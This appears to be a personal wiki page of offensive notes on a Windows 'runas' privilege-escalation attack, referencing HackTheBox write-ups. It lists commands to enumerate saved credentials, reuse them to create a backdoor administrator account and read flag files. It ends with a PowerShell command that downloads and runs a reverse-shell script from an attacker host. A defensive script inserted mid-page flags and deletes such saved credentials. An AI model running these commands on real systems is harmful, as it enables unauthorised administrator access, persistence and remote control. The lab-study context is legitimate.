Runas attack
lethanhtung01011980 edited this page Apr 22, 2020 · 13 revisions
- Runas "admin" with a saved admin password
- Already have a normal user
- No SYSTEM yet
- Ref: https://snowscan.io/htb-writeup-access/#
- List saved vaults:
vaultcmd /list
- List saved creds in saved vaults:
vaultcmd /listcreds:"Windows Vault"
=> Check whether Administrator appears in the saved creds
- All stored credentials (even to remote machines):
cmdkey /list
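The same enumeration from the defender's side, as an added example that is not part of the original page: a PowerShell script that parses `cmdkey /list` output and flags saved entries that `runas /savecred` would replay, with the command to remove each one. It assumes English-locale `cmdkey` output; the function name `ConvertFrom-CmdkeyList` and the sample output (including `fileserver01` and `svc_backup`) are constructed for illustration.

```powershell
# Constructed sample of `cmdkey /list` output (not captured from a real host).
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

    Target: LegacyGeneric:target=fileserver01
    Type: Generic
    User: svc_backup
'@

# Hypothetical helper: turn the Target/Type/User text blocks into objects.
function ConvertFrom-CmdkeyList {
    param([string[]]$Lines)
    $entry = $null
    foreach ($line in $Lines) {
        if ($line -match '^\s*Target:\s*(.+?)\s*$') {
            if ($entry) { [pscustomobject]$entry }   # emit the previous entry
            $entry = [ordered]@{ Target = $Matches[1]; Type = $null; User = $null }
        } elseif ($entry -and $line -match '^\s*(Type|User):\s*(.+?)\s*$') {
            $entry[$Matches[1]] = $Matches[2]
        }
    }
    if ($entry) { [pscustomobject]$entry }           # emit the last entry
}

# On a live host, replace the next line with:  $lines = cmdkey /list
$lines = $sample -split "`r?`n"

# "Domain:interactive=" entries are what runas /savecred stores and reuses,
# so any local user session holding one can run commands as that account.
$report = foreach ($e in (ConvertFrom-CmdkeyList -Lines $lines)) {
    $risk = if ($e.Target -like 'Domain:interactive=*') {
        if ($e.User -match '(^|\\)Administrator$') { 'HIGH' } else { 'REVIEW' }
    } else { 'INFO' }
    [pscustomobject]@{
        Risk   = $risk
        Target = $e.Target
        User   = $e.User
        Remove = "cmdkey /delete:`"$($e.Target)`""   # suggested clean-up command
    }
}
$report | Format-Table -AutoSize
```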
Runas
- Run as admin:
runas /user:administrator /savecred c:\Users\security\shell.bat
runas /user:ACCESS\Administrator /savecred "net user /add manolo Caca123"
runas /user:ACCESS\Administrator /savecred "net localgroup administrators manolo /add"
runas /user:ACCESS\Administrator /savecred "net localgroup TelnetClients manolo /add"
runas /user:ACCESS\Administrator /savecred "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\temp\caca"
- https://thecyberjedi.com/chatterbox/
- Using PowerShell, store the credentials in $creds for the session:
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('administrator', $passwd)
- A reverse shell can now be opened with the supplied credentials using the command:
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.14/Invoke-PowerShellTcp.ps1')" -Credential $creds